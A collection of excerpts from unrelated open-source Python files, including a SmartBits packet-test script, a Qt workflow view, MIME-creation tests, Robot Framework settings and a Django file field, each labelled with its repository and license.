HTRun will control transmission state of the card - with HTRUN mode it
will start transmitting, with HTSTOP it will stop transmitting.
A one second delay ensures the card has started transmitting, a while
loop checks to ensure the card has stopped transmitting before exiting.
The final 1 second wait allows time for the packets to get to the receive card.
"""
# Start transmission - card will transmit at whatever mode it is set to
HTRun( HTRUN, h1, s1, p1)
cs = HTCountStructure()
# Library 3.09 and higher includes delay function
NSDelay(1)
# Now wait until transmission stops
HTGetCounters( cs, h1, s1, p1)
while cs.TmtPktRate != 0:
HTGetCounters( cs, h1, s1, p1)
NSDelay(1)
def promptForEnter():
"""
promptForEnter
Press Enter to continue procedure
waits until user presses ENTER
"""
raw_input("Press ENTER to continue.")
def showCounters(h1, s1, p1):
"""
showCounters
    Display counts on the target card. HTClearPort will clear counts.
    Card counters always run; there is no Start command for counters.
    Each element has a corresponding Rate (i.e. TmtPktRate, RcvPktRate, etc.).
    These counts will display the packets-per-second counts while the card
is transmitting.
"""
cs = HTCount()
HTGetCounters( cs, h1, s1, p1)
print "========================================="
print "Counter Data Card", (s1 + 1)
print "========================================="
print " Transmitted Pkts " , cs.TmtPkt
print " Received Pkts " , cs.RcvPkt
print " Collisions " , cs.Collision
print " Received Triggers " , cs.RcvPkt
print " CRC Errors " , cs.CRC
print " Alignment Errors " , cs.Align
print " Oversize Pkts " , cs.Oversize
print " Undersize Pkts " , cs.Undersize
print "========================================="
promptForEnter()
def unlink():
ETUnLink()
####################################################################
# module self test. This is a translation from the 1stTest.c sample
# program.
if __name__ == "__main__":
import sys
hub1 = 0
slot1 = 0
port1 = 0
hub2 = 0
slot2 = 1
port2 = 0
numPackets = 100000
if len(sys.argv) > 1:
ipaddr = sys.argv[1]
else:
ipaddr = raw_input("Enter IP address of SmartBits chassis ==> ")
try:
ETSocketLink(ipaddr, 16385)
except Exception, err:
print "Error linking to chassis:", err
sys.exit()
print "successfully linked"
# reset cards
HTResetPort(RESET_FULL, hub1, slot1, port1)
HTResetPort(RESET_FULL, hub2, slot2, port2)
# clear counters
HTClearPort(hub1, slot1, port1)
HTClearPort(hub2, slot2, port2)
# set transmission parameters, single burst of numPackets packets
HTTransmitMode(SINGLE_BURST_MODE,hub1,slot1,port1)
HTBurstCount(numPackets,hub1,slot1,port1)
# start transmitting from the first card
HTRun(HTRUN,hub1,slot1,port1)
    # you may need a delay here before reading counter data
raw_input("Press ENTER key to get counts.")
# get the transmit counts from card1 then the receive counts from card2
cs = HTCountStructure()
HTGetCounters(cs, hub1, slot1, port1)
txPackets = cs.TmtPkt
HTGetCounters(cs, hub2, slot2, port2)
rxPackets = cs.RcvPkt
if txPackets == rxPackets:
print "Test Passed! %d packets transmitted and %d packets received." % (txPackets, rxPackets)
else:
        print "Test Failed! %d packets transmitted and %d packets received." % (txPackets, rxPackets)

MusculoskeletalAtlasProject/mapclient-src | mapclient/widgets/workflowgraphicsview.py | Python | gpl-3.0 | 10,128 | 0.002073

'''
MAP Client, a program to generate detailed musculoskeletal models for OpenSim.
Copyright (C) 2012 University of Auckland
This file is part of MAP Client. (http://launchpad.net/mapclient)
MAP Client is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
MAP Client is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with MAP Client. If not, see <http://www.gnu.org/licenses/>.
'''
import sys, math
from PySide import QtCore, QtGui
from mapclient.mountpoints.workflowstep import workflowStepFactory
from mapclient.widgets.workflowcommands import CommandSelection, CommandRemove, CommandAdd, CommandMove
from mapclient.core.workflowscene import MetaStep
from mapclient.widgets.workflowgraphicsitems import Node, Arc, ErrorItem, ArrowLine, StepPort
class WorkflowGraphicsView(QtGui.QGraphicsView):
def __init__(self, parent=None):
QtGui.QGraphicsView.__init__(self, parent)
self._selectedNodes = []
self._errorIconTimer = QtCore.QTimer()
self._errorIconTimer.setInterval(2000)
self._errorIconTimer.setSingleShot(True)
self._errorIconTimer.timeout.connect(self.errorIconTimeout)
self._errorIcon = None
self._undoStack = None
self._location = ''
self._connectLine = None
self._connectSourceNode = None
self._selectionStartPos = None
self.setCacheMode(QtGui.QGraphicsView.CacheBackground)
self.setRenderHint(QtGui.QPainter.Antialiasing)
grid_pic = QtGui.QPixmap(':/workflow/images/grid.png')
self._grid_brush = QtGui.QBrush(grid_pic)
# self.setTransformationAnchor(QtGui.QGraphicsView.AnchorUnderMouse)
# self.setResizeAnchor(QtGui.QGraphicsView.AnchorViewCenter)
self.setAcceptDrops(True)
def clear(self):
self.scene().clear()
def setUndoStack(self, stack):
self._undoStack = stack
def setLocation(self, location):
self._location = location
def connectNodes(self, node1, node2):
# Check if nodes are already connected
if not node1.hasArcToDestination(node2):
if node1.canConnect(node2):
command = CommandAdd(self.scene(), Arc(node1, node2))
self._undoStack.push(command)
else:
# add temporary line ???
if self._errorIconTimer.isActive():
self._errorIconTimer.stop()
self.errorIconTimeout()
self._errorIcon = ErrorItem(node1, node2)
self.scene().addItem(self._errorIcon)
self._errorIconTimer.start()
def selectionChanged(self):
currentSelection = self.scene().selectedItems()
previousSelection = self.scene().previouslySelectedItems()
command = CommandSelection(self.scene(), currentSelection, previousSelection)
self._undoStack.push(command)
self.scene().setPreviouslySelectedItems(currentSelection)
def nodeSelected(self, node, state):
if state == True and node not in self._selectedNodes:
self._selectedNodes.append(node)
elif state == False and node in self._selectedNodes:
found = self._selectedNodes.index(node)
del self._selectedNodes[found]
if len(self._selectedNodes) == 2:
self.connectNodes(self._selectedNodes[0], self._selectedNodes[1])
def keyPressEvent(self, event):
# super(WorkflowGraphicsView, self).keyPressEvent(event)
if event.key() == QtCore.Qt.Key_Backspace or event.key() == QtCore.Qt.Key_Delete:
            command = CommandRemove(self.scene(), self.scene().selectedItems())
self._undoStack.push(command)
event.accept()
else:
event.ignore()
def contextMenuEvent(self, event):
item = self.itemAt(event.pos())
if item and item.type() == Node.Type:
item.showContextMenu(event.globalPos())
def mousePressEvent(self, event):
        item = self.scene().itemAt(self.mapToScene(event.pos()))
if event.button() == QtCore.Qt.RightButton:
event.ignore()
elif item and item.type() == StepPort.Type:
centre = item.boundingRect().center()
self._connectSourceNode = item
self._connectLine = ArrowLine(QtCore.QLineF(item.mapToScene(centre),
self.mapToScene(event.pos())))
self.scene().addItem(self._connectLine)
else:
QtGui.QGraphicsView.mousePressEvent(self, event)
self._selectionStartPos = event.pos()
def mouseMoveEvent(self, event):
if self._connectLine:
newLine = QtCore.QLineF(self._connectLine.line().p1(), self.mapToScene(event.pos()))
self._connectLine.setLine(newLine)
else:
QtGui.QGraphicsView.mouseMoveEvent(self, event)
def mouseReleaseEvent(self, event):
if self._connectLine:
item = self.scene().itemAt(self.mapToScene(event.pos()))
if item and item.type() == StepPort.Type:
self.connectNodes(self._connectSourceNode, item)
self.scene().removeItem(self._connectLine)
self._connectLine = None
self._connectSourceNode = None
else:
QtGui.QGraphicsView.mouseReleaseEvent(self, event)
if self._selectionStartPos:
diff = event.pos() - self._selectionStartPos
if diff.x() != 0 and diff.y() != 0:
self._undoStack.beginMacro('Move Step(s)')
for item in self.scene().selectedItems():
if item.type() == Node.Type:
self._undoStack.push(CommandMove(item, item.pos() - diff, item.pos()))
self._undoStack.endMacro()
def errorIconTimeout(self):
self.scene().removeItem(self._errorIcon)
del self._errorIcon
def changeEvent(self, event):
if event.type() == QtCore.QEvent.EnabledChange:
self.invalidateScene(self.sceneRect())
def drawBackground(self, painter, rect):
# Shadow.
sceneRect = self.sceneRect()
rightShadow = QtCore.QRectF(sceneRect.right(), sceneRect.top() + 5, 5, sceneRect.height())
bottomShadow = QtCore.QRectF(sceneRect.left() + 5, sceneRect.bottom(), sceneRect.width(), 5)
if rightShadow.intersects(rect) or rightShadow.contains(rect):
painter.fillRect(rightShadow, QtCore.Qt.darkGray)
if bottomShadow.intersects(rect) or bottomShadow.contains(rect):
painter.fillRect(bottomShadow, QtCore.Qt.darkGray)
painter.setBrush(self._grid_brush) # QtCore.Qt.NoBrush
painter.drawRect(sceneRect)
def dropEvent(self, event):
if event.mimeData().hasFormat("image/x-workflow-step"):
pieceData = event.mimeData().data("image/x-workflow-step")
stream = QtCore.QDataStream(pieceData, QtCore.QIODevice.ReadOnly)
hotspot = QtCore.QPoint()
nameLen = stream.readUInt32()
name = stream.readRawData(nameLen).decode(sys.stdout.encoding)
stream >> hotspot
scene = self.scene()
position = self.mapToScene(event.pos() - hotspot)
metastep = MetaStep(workflowStepFactory(name, self._location))
node = Node(metastep)
metastep._step.registerConfiguredObserver(scene.stepConfigured)
metastep._step.registerDoneExecution(scene.doneExecution)
metastep._step.registerOnExecuteEntry(scene.setCurrentWidget)
metastep._step.registerIdentifierOccursCount(scene.identifierOccursCount)
            self._undoStack.push(CommandAdd(scene, node))

glyph/flanker | tests/mime/message/create_test.py | Python | apache-2.0 | 10,627 | 0.000292

# coding:utf-8
from nose.tools import *
from mock import *
import email
import json
from base64 import b64decode
from flanker.mime import create
from flanker.mime.message import errors
from flanker.mime.message.part import MimePart
from email.parser import Parser
from ... import *
def from_python_message_test():
python_message = Parser().parsestr(MULTIPART)
message = create.from_python(python_message)
eq_(python_message['Subject'], message.headers['Subject'])
ctypes = [p.get_content_type() for p in python_message.walk()]
ctypes2 = [str(p.content_type) for p in message.walk(with_self=True)]
eq_(ctypes, ctypes2)
payloads = [p.get_payload(decode=True) for p in python_message.walk()][1:]
payloads2 = [p.body for p in message.walk()]
eq_(payloads, payloads2)
def from_string_message_test():
message = create.from_string(IPHONE)
parts = list(message.walk())
eq_(3, len(parts))
eq_(u'\n\n\n~Danielle', parts[2].body)
def from_part_message_simple_test():
message = create.from_string(IPHONE)
parts = list(message.walk())
message = create.from_message(parts[2])
eq_(u'\n\n\n~Danielle', message.body)
def message_from_garbage_test():
assert_raises(errors.DecodingError, create.from_string, None)
assert_raises(errors.DecodingError, create.from_string, [])
assert_raises(errors.DecodingError, create.from_string, MimePart)
def create_singlepart_ascii_test():
message = create.text("plain", u"Hello")
message = create.from_string(message.to_string())
eq_("7bit", message.content_encoding.value)
eq_("Hello", message.body)
def create_singlepart_unicode_test():
message = create.text("plain", u"Привет, курилка")
message = create.from_string(message.to_string())
eq_("base64", message.content_encoding.value)
eq_(u"Привет, курилка", message.body)
def create_singlepart_ascii_long_lines_test():
very_long = "very long line " * 1000 + "preserve my newlines \r\n\r\n"
message = create.text("plain", very_long)
message2 = create.from_string(message.to_string())
eq_("quoted-printable", message2.content_encoding.value)
eq_(very_long, message2.body)
message2 = email.message_from_string(message.to_string())
eq_(very_long, message2.get_payload(decode=True))
def create_multipart_simple_test():
message = create.multipart("mixed")
message.append(
create.text("plain", "Hello"),
create.text("html", "<html>Hello</html>"))
ok_(message.is_root())
assert_false(message.parts[0].is_root())
assert_false(message.parts[1].is_root())
message2 = create.from_string(message.to_string())
eq_(2, len(message2.parts))
eq_("multipart/mixed", message2.content_type)
eq_(2, len(message.parts))
eq_("Hello", message.parts[0].body)
eq_("<html>Hello</html>", message.parts[1].body)
message2 = email.message_from_string(message.to_string())
eq_("multipart/mixed", message2.get_content_type())
eq_("Hello", message2.get_payload()[0].get_payload(decode=False))
eq_("<html>Hello</html>",
message2.get_payload()[1].get_payload(decode=False))
def create_multipart_with_attachment_test():
message = create.multipart("mixed")
    filename = u"Мейлган картиночка картиночечка с длинным именем и пробельчиками"
message.append(
create.text("plain", "Hello"),
create.text("html", "<html>Hello</html>"),
create.binary(
"image", "png", MAILGUN_PNG,
filename, "attachment"))
eq_(3, len(message.parts))
message2 = create.from_string(message.to_string())
eq_(3, len(message2.parts))
eq_("base64", message2.parts[2].content_encoding.value)
eq_(MAILGUN_PNG, message2.parts[2].body)
eq_(filename, message2.parts[2].content_disposition.params['filename'])
eq_(filename, message2.parts[2].content_type.params['name'])
ok_(message2.parts[2].is_attachment())
message2 = email.message_from_string(message.to_string())
eq_(3, len(message2.get_payload()))
eq_(MAILGUN_PNG, message2.get_payload()[2].get_payload(decode=True))
def create_multipart_with_text_non_unicode_attachment_test():
"""Make sure we encode text attachment in base64
"""
message = create.multipart("mixed")
filename = "text-attachment.txt"
message.append(
create.text("plain", "Hello"),
create.text("html", "<html>Hello</html>"),
create.binary(
"text", "plain", u"Саша с уралмаша".encode("koi8-r"),
filename, "attachment"))
message2 = create.from_string(message.to_string())
eq_(3, len(message2.parts))
attachment = message2.parts[2]
ok_(attachment.is_attachment())
eq_("base64", attachment.content_encoding.value)
eq_(u"Саша с уралмаша", attachment.body)
def create_multipart_with_text_non_unicode_attachment_preserve_encoding_test():
"""Make sure we encode text attachment in base64
and also preserve charset information
"""
message = create.multipart("mixed")
filename = "text-attachment.txt"
message.append(
create.text("plain", "Hello"),
create.text("html", "<html>Hello</html>"),
create.text(
"plain",
u"Саша с уралмаша 2".encode("koi8-r"),
"koi8-r",
"attachment",
filename))
message2 = create.from_string(message.to_string())
eq_(3, len(message2.parts))
attachment = message2.parts[2]
ok_(attachment.is_attachment())
eq_("base64", attachment.content_encoding.value)
eq_("koi8-r", attachment.charset)
eq_(u"Саша с уралмаша 2", attachment.body)
def create_multipart_nested_test():
message = create.multipart("mixed")
nested = create.multipart("alternative")
nested.append(
create.text("plain", u"Саша с уралмаша"),
create.text("html", u"<html>Саша с уралмаша</html>"))
message.append(
create.text("plain", "Hello"),
nested)
message2 = create.from_string(message.to_string())
eq_(2, len(message2.parts))
eq_('text/plain', message2.parts[0].content_type)
eq_('Hello', message2.parts[0].body)
eq_(u"Саша с уралмаша", message2.parts[1].parts[0].body)
eq_(u"<html>Саша с уралмаша</html>", message2.parts[1].parts[1].body)
def create_enclosed_test():
message = create.text("plain", u"Превед")
message.headers['From'] = u' Саша <sasha@mailgun.net>'
message.headers['To'] = u'Женя <ev@mailgun.net>'
message.headers['Subject'] = u"Все ли ок? Нормальненько??"
message = create.message_container(message)
message2 = create.from_string(message.to_string())
eq_('message/rfc822', message2.content_type)
eq_(u"Превед", message2.enclosed.body)
eq_(u'Саша <sasha@mailgun.net>', message2.enclosed.headers['From'])
def create_enclosed_nested_test():
nested = create.multipart("alternative")
nested.append(
create.text("plain", u"Саша с уралмаша"),
create.text("html", u"<html>Саша с уралмаша</html>"))
message = create.multipart("mailgun-recipient-variables")
variables = {"a": u"<b>Саша</b>" * 1024}
message.append(
create.binary("application", "json", json.dumps(variables)),
create.message_container(nested))
message2 = create.from_string(message.to_string())
eq_(variables, json.loads(message2.parts[0].body))
nested = message2.parts[1].enclosed
eq_(2, len(nested.parts))
eq_(u"Саша с уралмаша", nested.parts[0].body)
eq_(u"<html>Саша с уралмаша</html>", nested.parts[1].body)
def guessing_attachments_test():
binary = create.binary(
"application", 'octet-stream', MAILGUN_PNG, '/home/alex/mailgun.png')
eq_('image/png', binary.content_type)
eq_('mailgun.png', binary.content_type.params['name'])
binary = create.binary(
"application", 'octet-stream',
MAILGUN_PIC, '/home/alex/mailgun.png', disposition='attachment')
eq_('attachment', binary.headers['Content-Disposition'].value)
eq_('mailgun.png', binary.headers['Content-Disposition'].params['filename'])
binary = create.binary(
"application", 'octet-stream', NOTIFIC

SummerLW/Perf-Insight-Report | telemetry/telemetry/value/trace.py | Python | bsd-3-clause | 4,564 | 0.008326

# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import datetime
import logging
import os
import random
import shutil
import StringIO
import sys
import tempfile
from catapult_base import cloud_storage # pylint: disable=import-error
from telemetry.internal.util import file_handle
from telemetry.timeline import trace_data as trace_data_module
from telemetry import value as value_module
from tracing_build import trace2html
class TraceValue(value_module.Value):
def __init__(self, page, trace_data, important=False, description=None):
"""A value that contains a TraceData object and knows how to
output it.
Adding TraceValues and outputting as JSON will produce a directory full of
HTML files called trace_files. Outputting as chart JSON will also produce
an index, files.html, linking to each of these files.
"""
super(TraceValue, self).__init__(
page, name='trace', units='', important=important,
description=description, tir_label=None)
self._temp_file = self._GetTempFileHandle(trace_data)
self._cloud_url = None
self._serialized_file_handle = None
def _GetTempFileHandle(self, trace_data):
if self.page:
title = self.page.display_name
else:
title = ''
content = StringIO.StringIO()
trace2html.WriteHTMLForTraceDataToFile(
[trace_data.GetEventsFor(trace_data_module.CHROME_TRACE_PART)],
title,
content)
tf = tempfile.NamedTemporaryFile(delete=False, suffix='.html')
tf.write(content.getvalue().encode('utf-8'))
tf.close()
return file_handle.FromTempFile(tf)
def __repr__(self):
if self.page:
page_name = self.page.display_name
else:
page_name = 'None'
return 'TraceValue(%s, %s)' % (page_name, self.name)
def CleanUp(self):
"""Cleans up tempfile after it is no longer needed.
A cleaned up TraceValue cannot be used for further operations. CleanUp()
may be called more than once without error.
"""
if self._temp_file is None:
return
os.remove(self._temp_file.GetAbsPath())
self._temp_file = None
def __enter__(self):
return self
def __exit__(self, _, __, ___):
self.CleanUp()
@property
def cleaned_up(self):
return self._temp_file is None
def GetBuildbotDataType(self, output_context):
return None
def GetBuildbotValue(self):
return None
def GetRepresentativeNumber(self):
return None
def GetRepresentativeString(self):
return None
@staticmethod
def GetJSONTypeName():
return 'trace'
@classmethod
def MergeLikeValuesFromSamePage(cls, values):
assert len(values) > 0
return values[0]
@classmethod
def MergeLikeValuesFromDifferentPages(cls, values):
return None
def AsDict(self):
if self._temp_file is None:
raise ValueError('Tried to serialize TraceValue without tempfile.')
d = super(TraceValue, self).AsDict()
if self._serialized_file_handle:
d['file_id'] = self._serialized_file_handle.id
if self._cloud_url:
d['cloud_url'] = self._cloud_url
return d
def Serialize(self, dir_path):
if self._temp_file is None:
raise ValueError('Tried to serialize nonexistent trace.')
file_name = str(self._temp_file.id) + self._temp_file.extension
file_path = os.path.abspath(os.path.join(dir_path, file_name))
shutil.copy(self._temp_file.GetAbsPath(), file_path)
self._serialized_file_handle = file_handle.FromFilePath(file_path)
    return self._serialized_file_handle
def UploadToCloud(self, bucket):
if self._temp_file is None:
raise ValueError('Tried to upload nonexistent trace to Cloud Storage.')
try:
if self._serialized_file_handle:
fh = self._serialized_file_handle
else:
fh = self._temp_file
remote_path = ('trace-file-id_%s-%s-%d%s' % (
fh.id,
          datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S'),
random.randint(1, 100000),
fh.extension))
self._cloud_url = cloud_storage.Insert(
bucket, remote_path, fh.GetAbsPath())
sys.stderr.write(
'View generated trace files online at %s for page %s\n' %
(self._cloud_url, self.page.url if self.page else 'unknown'))
return self._cloud_url
except cloud_storage.PermissionError as e:
logging.error('Cannot upload trace files to cloud storage due to '
' permission error: %s' % e.message)

drtoful/pyvault | tests/02_store_test.py | Python | bsd-3-clause | 1,342 | 0.002981

import unittest
import os
from nose.tools import assert_true
from nose.tools import assert_false
from pyvault import PyVault
from pyvault.backends.file import PyVaultFileBackend
from pyvault.backends.ptree import PyVaultPairtreeBackend
class VaultStore(unittest.TestCase):
"""
    testing storing data into the vault with different
backends and their resulting files.
"""
def test_store_file(self):
backend = PyVaultFileBackend("/tmp/_pyvault_file")
vault = PyVault(backend)
        vault.unlock("passphrase", False)
assert_false(vault.is_locked())
vault.store("key", "secret")
assert_true(os.path.isfile("/tmp/_pyvault_file/8335fa56d487562de248f47befc72743334051ddffcc2c09275f665454990317594745ee17c08f798cd7dce0ba8155dcda14f6398c1d1545116520a133017c09"))
def test_store_ptree(self):
backend = PyVaultPairtreeBackend("/tmp/_pyvault_ptree")
vault = PyVault(backend)
vault.unlock("passphrase", False)
assert_false(vault.is_locked())
vault.store("key", "secret")
assert_true(os.path.isfile("/tmp/_pyvault_ptree/pairtree_root/83/35/fa/56/d4/87/56/2d/e2/48/f4/7b/ef/c7/27/43/33/40/51/dd/ff/cc/2c/09/27/5f/66/54/54/99/03/17/59/47/45/ee/17/c0/8f/79/8c/d7/dc/e0/ba/81/55/dc/da/14/f6/39/8c/1d/15/45/11/65/20/a1/33/01/7c/09/obj/data"))

callowayproject/django-articleappkit | articleappkit/fields.py | Python | apache-2.0 | 1,369 | 0.002191

import datetime
import os
from django.db.models.fields.files import FileField
from django.core.files.storage import default_storage
from django.utils.encoding import force_unicode, smart_str
class ModelUploadFileField(FileField):
"""
Makes the upload_to parameter optional by using the name of the model
"""
def __init__(self, verbose_name=None, name=None, storage=None, **kwargs):
for arg in ('primary_key', 'unique'):
if arg in kwargs:
raise TypeError("'%s' is not a valid argument for %s." % (arg, self.__class__))
self.storage = storage or default_storage
upload_to = kwargs.pop('upload_to', '$$MODEL$$')
if not upload_to:
upload_to = '$$MODEL$$'
self.upload_to = upload_to
        if callable(upload_to):
self.generate_filename = upload_to
kwargs['max_length'] = kwargs.get('max_length', 100)
super(FileField, self).__init__(verbose_name, name, **kwargs)
def get_directory_name(self):
return os.path.normpath(force_unicode(datetime.datetime.now().strftime(smart_str(self.upload_to))))
def generate_filename(self, instance, filename):
if self.upload_to == '$$MODEL$$':
self.upload_to = instance._meta.verbose_name
return os.path.join(self.get_directory_name(), self.get_filename(filename))
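A usage sketch of this field in a model definition (the `Article` model is illustrative, not from the repo):

```python
from django.db import models
from articleappkit.fields import ModelUploadFileField

class Article(models.Model):
    # With upload_to omitted, uploads land under a directory derived from
    # the model's verbose_name, expanded through strftime at upload time.
    attachment = ModelUploadFileField(blank=True)
```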

pybursa/homeworks | o_shestakoff/hw5/hw5_tests.py | Python | gpl-2.0 | 953 | 0.001072

# -*- coding: utf8 -*-
u"""
Tests for homework #5.
"""
__author__ = "wowkalucky"
__email__ = "wowkalucky@gmail.com"
__date__ = "2014-11-17"
import datetime
from hw5_solution1 import Person
def tests_for_hw5_solution1():
    u"""Tests for task 1"""
petroff = Person("Petrov", "Petro", "1952-01-02")
ivanoff = Person("Ivanov", "Ivan", "2000-10-20")
sydoroff = Person("Sidorov", "Semen", "1980-12-31", "Senya")
assert "first_name" in dir(petroff)
assert "get_fullname" in
|
dir(ivanoff)
assert "nickname" not in dir(petroff)
assert "nickname" in dir(sydoroff)
assert petroff.surname == "Petrov"
    assert petroff.first_name == "Petro"
assert petroff.get_fullname() == "Petrov Petro"
assert sydoroff.nickname == "Senya"
assert petroff.birth_date == datetime.date(1952, 01, 02)
assert isinstance(petroff.birth_date, datetime.date)
assert petroff.get_age() == "62"
print 'All is Ok!'
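The `hw5_solution1` module is not included in this sample; a minimal Python 2 `Person` consistent with these assertions might look like this (note the `get_age() == "62"` assertion is date-dependent):

```python
# -*- coding: utf8 -*-
import datetime

class Person(object):
    def __init__(self, surname, first_name, birth_date, nickname=None):
        self.surname = surname
        self.first_name = first_name
        # birth_date arrives as an ISO "YYYY-MM-DD" string
        self.birth_date = datetime.datetime.strptime(
            birth_date, "%Y-%m-%d").date()
        if nickname is not None:
            self.nickname = nickname  # attribute exists only when given

    def get_fullname(self):
        return "%s %s" % (self.surname, self.first_name)

    def get_age(self):
        # The tests expect a string; the value depends on today's date.
        today = datetime.date.today()
        age = today.year - self.birth_date.year - (
            (today.month, today.day) <
            (self.birth_date.month, self.birth_date.day))
        return str(age)
```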

wojciechtanski/robotframework | src/robot/conf/settings.py | Python | apache-2.0 | 20,981 | 0.003146

# Copyright 2008-2015 Nokia Solutions and Networks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import random
import sys
import time
from robot import utils
from robot.errors import DataError, FrameworkError
from robot.output import LOGGER, loggerhelper
from robot.result.keywordremover import KeywordRemover
from robot.result.flattenkeywordmatcher import FlattenKeywordMatcher
from .gatherfailed import gather_failed_tests
class _BaseSettings(object):
_cli_opts = {'Name' : ('name', None),
'Doc' : ('doc', None),
'Metadata' : ('metadata', []),
'TestNames' : ('test', []),
'ReRunFailed' : ('rerunfailed', 'NONE'),
'DeprecatedRunFailed': ('runfailed', 'NONE'), # TODO: Remove in RF 2.10/3.0.
'SuiteNames' : ('suite', []),
'SetTag' : ('settag', []),
'Include' : ('include', []),
'Exclude' : ('exclude', []),
'Critical' : ('critical', None),
'NonCritical' : ('noncritical', None),
'OutputDir' : ('outputdir', utils.abspath('.')),
'Log' : ('log', 'log.html'),
'Report' : ('report', 'report.html'),
'XUnit' : ('xunit', None),
'SplitLog' : ('splitlog', False),
'TimestampOutputs' : ('timestampoutputs', False),
'LogTitle' : ('logtitle', None),
'ReportTitle' : ('reporttitle', None),
'ReportBackground' : ('reportbackground',
('#99FF66', '#99FF66', '#FF3333')),
'SuiteStatLevel' : ('suitestatlevel', -1),
'TagStatInclude' : ('tagstatinclude', []),
'TagStatExclude' : ('tagstatexclude', []),
'TagStatCombine' : ('tagstatcombine', []),
'TagDoc' : ('tagdoc', []),
'TagStatLink' : ('tagstatlink', []),
'RemoveKeywords' : ('removekeywords', []),
'FlattenKeywords' : ('flattenkeywords', []),
'StatusRC' : ('statusrc', True),
'MonitorColors' : ('monitorcolors', 'AUTO'),
'StdOut' : ('stdout', None),
'StdErr' : ('stderr', None),
'XUnitSkipNonCritical' : ('xunitskipnoncritical', False)}
_output_opts = ['Output', 'Log', 'Report', 'XUnit', 'DebugFile']
def __init__(self, options=None, **extra_options):
self.start_timestamp = utils.format_time(time.time(), '', '-', '')
self._opts = {}
self._cli_opts = self._cli_opts.copy()
self._cli_opts.update(self._extra_cli_opts)
self._process_cli_opts(dict(options or {}, **extra_options))
def _process_cli_opts(self, opts):
for name, (cli_name, default) in self._cli_opts.items():
value = opts[cli_name] if cli_name in opts else default
if default == [] and isinstance(value, basestring):
value = [value]
self[name] = self._process_value(name, value)
self['TestNames'] += self['ReRunFailed'] or self['DeprecatedRunFailed']
def __setitem__(self, name, value):
if name not in self._cli_opts:
raise KeyError("Non-existing settings '%s'" % name)
self._opts[name] = value
def _process_value(self, name, value):
if name == 'ReRunFailed':
return gather_failed_tests(value)
if name == 'DeprecatedRunFailed':
if value.upper() != 'NONE':
LOGGER.warn('Option --runfailed is deprecated and will be '
'removed in the future. Use --rerunfailed instead.')
return gather_failed_tests(value)
if name == 'DeprecatedMerge' and value is True:
LOGGER.warn('Option --rerunmerge is deprecated and will be '
'removed in the future. Use --merge instead.')
if name == 'LogLevel':
return self._process_log_level(value)
if value == self._get_default_value(name):
return value
if name in ['Name', 'Doc', 'LogTitle', 'ReportTitle']:
if name == 'Doc':
value = self._escape_as_data(value)
return value.replace('_', ' ')
if name in ['Metadata', 'TagDoc']:
if name == 'Metadata':
value = [self._escape_as_data(v) for v in value]
return [self._process_metadata_or_tagdoc(v) for v in value]
if name in ['Include', 'Exclude']:
return [self._format_tag_patterns(v) for v in value]
if name in self._output_opts and (not value or value.upper() == 'NONE'):
return None
if name == 'OutputDir':
return utils.abspath(value)
if name in ['SuiteStatLevel', 'MonitorWidth']:
return self._convert_to_positive_integer_or_default(name, value)
if name in ['Listeners', 'VariableFiles']:
return [self._split_args_from_name_or_path(item) for item in value]
if name == 'ReportBackground':
return self._process_report_background(value)
if name == 'TagStatCombine':
return [self._process_tag_stat_combine(v) for v in value]
if name == 'TagStatLink':
return [v for v in [self._process_tag_stat_link(v) for v in value] if v]
if name == 'Randomize':
return self._process_randomize_value(value)
if name == 'RemoveKeywords':
self._validate_remove_keywords(value)
if name == 'FlattenKeywords':
self._validate_flatten_keywords(value)
return value
def _escape_as_data(self, value):
return value
def _process_log_level(self, level):
level, visible_level = self._split_log_level(level.upper())
self._opts['VisibleLogLevel'] = visible_level
return level
def _split_log_level(self, level):
if ':' in level:
level, visible_level = level.split(':', 1)
else:
visible_level = level
self._validate_log_level_and_default(level, visible_level)
return level, visible_level
def _validate_log_level_and_default(self, log_level, default):
        if log_level not in loggerhelper.LEVELS:
raise DataError("Invalid log level '%s'" % log_level)
if default not in loggerhelper.LEVELS:
raise DataError("Invalid log level '%s'" % defa
|
ult)
if not loggerhelper.IsLogged(log_level)(default):
raise DataError("Default visible log level '%s' is lower than "
"log level '%s'" % (default, log_level))
def _process_randomize_value(self, original):
value = original.lower()
if ':' in value:
value, seed = value.split(':', 1)
else:
seed = random.randint(0, sys.maxint)
if value in ('test', 'suite'):
value += 's'
if value not in ('tests', 'suites', 'none', 'all'):
self._raise_invalid_option_value('--randomize', original)
try:
seed = int(seed)
except ValueError:
self._raise_invalid_option_value('--randomize', original)
return value, seed
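    # Illustrative (not part of the original source): a '--randomize tests:1234'
    # option reaches this method as 'tests:1234' and returns ('tests', 1234);
    # a bare 'suite' becomes ('suites', <random seed>).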
def _raise_invalid_option_value(self, option_name, given_value):
raise DataError("Option '%s' does not support value '%s'."
                        % (option_name, given_value))
|
zerolab/wagtail
|
wagtail/tests/demosite/migrations/0002_capitalizeverbose.py
|
Python
|
bsd-3-clause
| 318
| 0
|
# -*- coding: utf-8 -*-
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('demosite', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='homepage',
            options={'verbose_name': 'homepage'},
),
]
|
ivanhorvath/openshift-tools
|
ansible/roles/lib_openshift_3.2/library/oc_secret.py
|
Python
|
apache-2.0
| 37,290
| 0.002789
|
#!/usr/bin/env python # pylint: disable=too-many-lines
# ___ ___ _ _ ___ ___ _ _____ ___ ___
# / __| __| \| | __| _ \ /_\_ _| __| \
# | (_ | _|| .` | _|| / / _ \| | | _|| |) |
# \___|___|_|\_|___|_|_\/_/_\_\_|_|___|___/_ _____
# | \ / _ \ | \| |/ _ \_ _| | __| \_ _|_ _|
